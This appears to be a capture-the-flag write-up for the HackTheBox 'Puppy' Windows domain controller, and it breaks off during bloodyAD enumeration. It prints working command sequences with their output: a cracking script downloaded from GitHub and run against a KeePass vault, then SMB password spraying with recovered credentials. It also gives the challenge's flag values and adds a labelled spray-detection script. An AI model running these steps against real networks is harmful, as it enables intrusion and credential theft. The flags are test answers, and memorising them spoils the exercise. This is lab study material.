Writeup Anonymous Puppy

The document provides a detailed report on a penetration testing exercise conducted on a Microsoft Windows Server 2022 system, including information about the system's IP address, open ports, and discovered flags. It outlines the enumeration process, user credentials, vulnerabilities found, and exploitation attempts, particularly focusing on accessing shared files. The report also includes commands used during the testing and results from tools like Nmap and CrackMapExec.


Puppy

General Information

IP address: xx.xx.xx.xx
Operating System Name (Distribution): Microsoft Windows Server 2022 Standard
Operating System Kernel Version: 10.0.20348 N/A Build 20348
Web Server Software and Version: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Open Ports: 53, 88, 111, 135, 139, 389, 445, 464, 593, 636, 2049, 3260, 3268, 3269, 5985

Flags Found

💡 Copy the flag into the designated section. Also put a screenshot of the screen where the flag was found in this section.

User Flag

💡 User Flag: b45203f370ae16d7f2e70540f2023a764

Root Flag

💡 Root Flag: 2ceb313f373dab54d3eb28e0ed2d6f762

Vulnerabilities Found

💡 Fill in every vulnerability you found here and leave a link for more detailed information about it. You also need to explain here what the vulnerability can cause and which exploit it is broken with. The first vulnerability listed is given as an example for you. Enter all the vulnerabilities you manage to find.

CVE ID: CVE-XXXX-XXXX
Description: This CVE exists in version 2.X.X of program X and helps the attacker carry out attack X. This vulnerability is called the X vulnerability. It can be studied in detail via this link. [Leave a link.]
Exploit: an exploit link must be given, if one exists.

Report

💡 Write up in detail what you did at each stage, explained with screenshots and the exploits used.

Enumeration (Information Gathering)


As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james /
KingofAkron2025!

The username and password are given:


user: levi.james
password: KingofAkron2025!


┌──(kali㉿kali)-[~]
└─$ nmap -A xx.xx.xx.xx --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 15:00 EDT
Nmap scan report for xx.xx.xx.xx
Host is up (0.097s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 02:00:50Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-
Name)

445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site
-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:window
s_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microso
ft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


| smb2-time:
| date: 2025-05-18T02:02:51
|_ start_date: N/A
|_clock-skew: 7h00m01s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

TRACEROUTE (using port 445/tcp)


HOP RTT ADDRESS
1 96.82 ms xx.xx.xx.xx
2 96.78 ms xx.xx.xx.xx

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.71 seconds

We enumerate the domain users with crackmapexec, using the given username and password.

┌──(kali ㉿kali)-[~]
└─$ sudo crackmapexec smb xx.xx.xx.xx -u levi.james -p 'KingofAkron2025!' --users
SMB xx.xx.xx.xx 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB xx.xx.xx.xx 445 DC [+] Enumerated domain user(s)
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 5 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\steph.cooper badpwdcount: 5 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\jamie.williams badpwdcount: 5 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\adam.silver badpwdcount: 0 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\ant.edwards badpwdcount: 0 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\levi.james badpwdcount: 0 desc:

SMB xx.xx.xx.xx 445 DC PUPPY.HTB\krbtgt badpwdcount: 0 desc: Key Distribution
Center Service Account
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\Guest badpwdcount: 0 desc: Built-in account
for guest access to the computer/domain
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\Administrator badpwdcount: 0 desc: Built-in accou
nt for administering the computer/domain

We add the domain and domain controller, DC.PUPPY.HTB and PUPPY.HTB, to /etc/hosts.


┌──(kali kali)-[~]
└─$ echo "xx.xx.xx.xx DC.PUPPY.HTB PUPPY.HTB" | sudo tee -a /etc/hosts
10.10.11.70 DC.PUPPY.HTB PUPPY.HTB

We separate out the users and write them to a single users.txt file.


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ cat users.txt
Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm

We put the domain controller's IP into /etc/resolv.conf and scan with bloodhound-python.

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ sudo nano /etc/resolv.conf

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ cat /etc/resolv.conf
nameserver xx.xx.xx.xx
nameserver 8.8.8.8
nameserver 1.1.1.1
nameserver 192.168.0.1


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns xx.xx.xx.xx
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB

INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 19S

Our user has GenericWrite on the Developers group, but we cannot go further with that alone, so we search deeper.

Exploitation (Breaking In)

We list the available file shares with crackmapexec.


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ sudo crackmapexec smb xx.xx.xx.xx -u levi.james -p 'KingofAkron2025!' --shares
SMB xx.xx.xx.xx 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB xx.xx.xx.xx 445 DC [+] Enumerated shares
SMB xx.xx.xx.xx 445 DC Share Permissions Remark
SMB xx.xx.xx.xx 445 DC ----- ----------- ------
SMB xx.xx.xx.xx 445 DC ADMIN$ Remote Admin
SMB xx.xx.xx.xx 445 DC C$ Default share
SMB xx.xx.xx.xx 445 DC DEV DEV-SHARE for PUPPY-DEVS
SMB xx.xx.xx.xx 445 DC IPC$ READ Remote IPC
SMB xx.xx.xx.xx 445 DC NETLOGON READ Logon server share
SMB xx.xx.xx.xx 445 DC SYSVOL READ Logon server share

There is a DEV share; we try to access it.

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ smbclient \\\\xx.xx.xx.xx\\DEV -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Mar 23 03:07:57 2025
.. D 0 Sat Mar 8 11:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 03:09:12 2025
Projects D 0 Sat Mar 8 11:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 22:25:46 2025

5080575 blocks of size 4096. 1545105 blocks available


smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \>

We try to crack recovery.kdbx.


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ sudo apt install keepassxc


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy]
└─$ wget https://raw.githubusercontent.com/r3nt0n/keepass4brute/master/keepass4brute.sh

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ chmod +x keepass4brute.sh

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ ./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt

keepass4brute 1.3 by r3nt0n


https://github.com/r3nt0n/keepass4brute

[+] Words tested: 38/14344394 - Attempts per minute: 63 - Estimated time remaining: 22 weeks, 4 days
[+] Current attempt: liver...

[*] Password found: liver....

We found the password: liverpool.

We export the passwords and data in recovery.kdbx to the file keepass_dump.xml in XML format.


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ keepassxc-cli export --format=xml recovery.kdbx > keepass_dump.xml
Enter password to unlock recovery.kdbx: liver...

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ ll
total 32
-rw-rw-r-- 1 kali kali 0 May 17 15:30 hash.txt
-rwxrwxr-x 1 kali kali 2820 May 17 15:34 keepass4brute.sh
-rw-rw-r-- 1 kali kali 12960 May 17 15:47 keepass_dump.xml
drwxrwxr-x 3 kali kali 4096 May 17 15:38 mod0keecrack

-rw-r--r-- 1 kali kali 2677 May 17 15:23 recovery.kdbx
-rw-rw-r-- 1 kali kali 111 May 17 15:09 users.txt

Now we read keepass_dump.xml.


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ head keepass_dump.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<KeePassFile>
<Meta>
<Generator>KeePassXC</Generator>
<DatabaseName>recovery</DatabaseName>
<DatabaseNameChanged>HqBg3w4AAAA=</DatabaseNameChanged>
<DatabaseDescription>recover AD members, incase of lost credentials</DatabaseDescription>
<DatabaseDescriptionChanged>HqBg3w4AAAA=</DatabaseDescriptionChanged>
<DefaultUserName/>
<DefaultUserNameChanged>+Z9g3w4AAAA=</DefaultUserNameChanged>

With a script we extract the usernames and passwords from the KeePass XML export.


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ cat extract_keepass.py
import xml.etree.ElementTree as ET

tree = ET.parse('keepass_dump.xml')
root = tree.getroot()

# iter('Entry') also descends into each entry's <History>, so an entry that
# has been edited is reported once per saved revision; that is why most
# passwords appear twice in the output below.
for entry in root.iter('Entry'):
    username = None
    password = None
    for string in entry.findall('String'):
        # findtext() returns None when the child is missing instead of raising
        key = string.findtext('Key')
        value = string.findtext('Value')
        if key == 'UserName':
            username = value
        elif key == 'Password':
            password = value
    if username or password:
        print(f"User: {username}, Password: {password}")

We extract only the passwords and save them to the file passwords_only.txt.


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ python3 extract_keepass.py | awk -F'Password: ' '{print $2}' > passwords_only.txt

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ ll
total 40
-rw-rw-r-- 1 kali kali 498 May 17 15:54 extract_keepass.py
-rw-rw-r-- 1 kali kali 0 May 17 15:30 hash.txt
-rwxrwxr-x 1 kali kali 2820 May 17 15:34 keepass4brute.sh
-rw-rw-r-- 1 kali kali 12960 May 17 15:47 keepass_dump.xml
drwxrwxr-x 3 kali kali 4096 May 17 15:38 mod0keecrack

-rw-rw-r-- 1 kali kali 99 May 17 15:55 passwords_only.txt
-rw-rw-r-- 1 kali kali 0 May 17 15:53 passwords.txt
-rw-r--r-- 1 kali kali 2677 May 17 15:23 recovery.kdbx
-rw-rw-r-- 1 kali kali 111 May 17 15:09 users.txt


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ cat passwords_only.txt
JamieLove2025!
HJKL2025!
HJKL2025!
Antman2025!
Antman2025!
Steve2025!
Steve2025!
ILY2025!
ILY2025!

We do password spraying with crackmapexec.


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ crackmapexec smb 10.10.11.70 -u users.txt -p passwords_only.txt --continue-on-success
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HT
B) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Antman2025! STATUS_LOGON_FAILURE

SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE

SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE

[+] PUPPY.HTB\ant.edwards:Antman2025!
Antman2025!
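From the defender's side, the spray above has a clear shape in the domain controller's Security log: one source produces failed logons (Event ID 4625) against many different accounts within a few minutes, then a successful logon (Event ID 4624) for the one account whose password matched. The detection below is an added example, not part of the original writeup; the log format, source IPs and timestamps are constructed to mirror that pattern.

```python
"""Password-spray detection over simplified Windows logon events (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed, simplified event format: time|event_id|source_ip|account|ntstatus
# 0xC000006D is STATUS_LOGON_FAILURE, the status crackmapexec printed above.
# 10.10.14.5 plays the spraying host; 10.10.11.50 is a user mistyping a password.
SAMPLE_LOG = """\
2025-05-17 16:00:01|4625|10.10.14.5|Administrator|0xC000006D
2025-05-17 16:00:02|4625|10.10.14.5|Guest|0xC000006D
2025-05-17 16:00:03|4625|10.10.14.5|krbtgt|0xC000006D
2025-05-17 16:00:04|4625|10.10.14.5|levi.james|0xC000006D
2025-05-17 16:00:05|4625|10.10.14.5|ant.edwards|0xC000006D
2025-05-17 16:00:06|4624|10.10.14.5|ant.edwards|0x0
2025-05-17 16:00:07|4625|10.10.14.5|adam.silver|0xC000006D
2025-05-17 16:00:08|4625|10.10.14.5|jamie.williams|0xC000006D
2025-05-17 16:00:09|4625|10.10.14.5|steph.cooper|0xC000006D
2025-05-17 16:20:00|4625|10.10.11.50|steph.cooper|0xC000006D
2025-05-17 16:20:30|4625|10.10.11.50|steph.cooper|0xC000006D
2025-05-17 16:21:00|4625|10.10.11.50|steph.cooper|0xC000006D
2025-05-17 16:21:30|4624|10.10.11.50|steph.cooper|0x0
"""


@dataclass(frozen=True)
class LogonEvent:
    time: datetime
    event_id: int      # 4625 = failed logon, 4624 = successful logon
    source_ip: str
    account: str
    status: str


def parse_events(text):
    """Parse the constructed pipe-separated format into LogonEvent objects."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, eid, ip, acct, status = (f.strip() for f in line.split("|"))
        events.append(LogonEvent(datetime.strptime(t, "%Y-%m-%d %H:%M:%S"),
                                 int(eid), ip, acct, status))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Return {source_ip: {"accounts_targeted": [...], "compromised": [...]}}
    for every source whose failed logons inside one `window` touched at
    least `min_accounts` distinct accounts. Counting distinct accounts rather
    than raw failures is what separates a spray from one user mistyping."""
    failures = defaultdict(list)   # source_ip -> [(time, account)]
    successes = defaultdict(set)   # source_ip -> accounts that logged on
    for e in events:
        if e.event_id == 4625:
            failures[e.source_ip].append((e.time, e.account))
        elif e.event_id == 4624:
            successes[e.source_ip].add(e.account)

    alerts = {}
    for ip, fails in failures.items():
        fails.sort()
        best, start = set(), 0
        for end in range(len(fails)):
            # advance the window start until it spans at most `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            accounts = {acct for _, acct in fails[start:end + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            alerts[ip] = {
                "accounts_targeted": sorted(best),
                # a success for an account that was also sprayed is a hit
                "compromised": sorted(best & successes[ip]),
            }
    return alerts


def analyze(log_text=SAMPLE_LOG):
    return detect_spray(parse_events(log_text))


if __name__ == "__main__":
    for ip, info in analyze().items():
        print(f"[!] spray from {ip}: {len(info['accounts_targeted'])} accounts, "
              f"compromised: {info['compromised'] or 'none'}")
```

On a real DC the same logic would run over 4625/4624 events with the source taken from the IpAddress field; the badpwdcount values in the user enumeration above are the per-account residue of such a spray.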


┌──(kali㉿kali)-[~/Desktop/HTB/Puppy/edward]
└─$ bloodhound-python -dc DC.PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns xx.xx.xx.xx
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 20S


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB


thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
